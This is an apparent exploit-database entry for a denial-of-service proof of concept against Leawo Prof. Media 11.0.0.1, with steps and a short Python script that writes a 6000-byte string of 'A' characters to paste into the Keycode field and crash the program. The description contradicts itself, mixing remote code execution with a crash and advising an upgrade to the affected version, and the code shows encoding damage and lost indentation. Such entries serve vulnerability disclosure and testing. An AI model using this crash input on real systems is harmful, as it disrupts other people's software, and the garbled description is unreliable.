Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)

vendor:

Prof. Media

by:

Achilles

7,5

CVSS

HIGH

Denial of Service (DoS)

119

CWE

Product Name: Prof. Media

Affected Version From: 11.0.0.1

Affected Version To: 11.0.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:leawo:prof._media:11.0.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64

2021

Leawo Prof. Media 11.0.0.1 – Denial of Service (DoS) (PoC)

A vulnerability in Leawo Prof. Media 11.0.0.1 could allow an attacker to cause a denial of service (DoS) condition. The vulnerability exists due to a boundary error when processing user-supplied input. A remote attacker can create a specially crafted file, trick the victim into opening it, and execute arbitrary code on the system. Successful exploitation of this vulnerability could result in a denial of service condition.

Mitigation:

Upgrade to the latest version of Leawo Prof. Media 11.0.0.1 or apply the appropriate patch.

Source

Exploit-DB raw data:

# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.leawo.org
# Software Link:  https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64


# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.

#!/usr/bin/env python
buffer =3D "\x41" * 6000

try:
f = open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"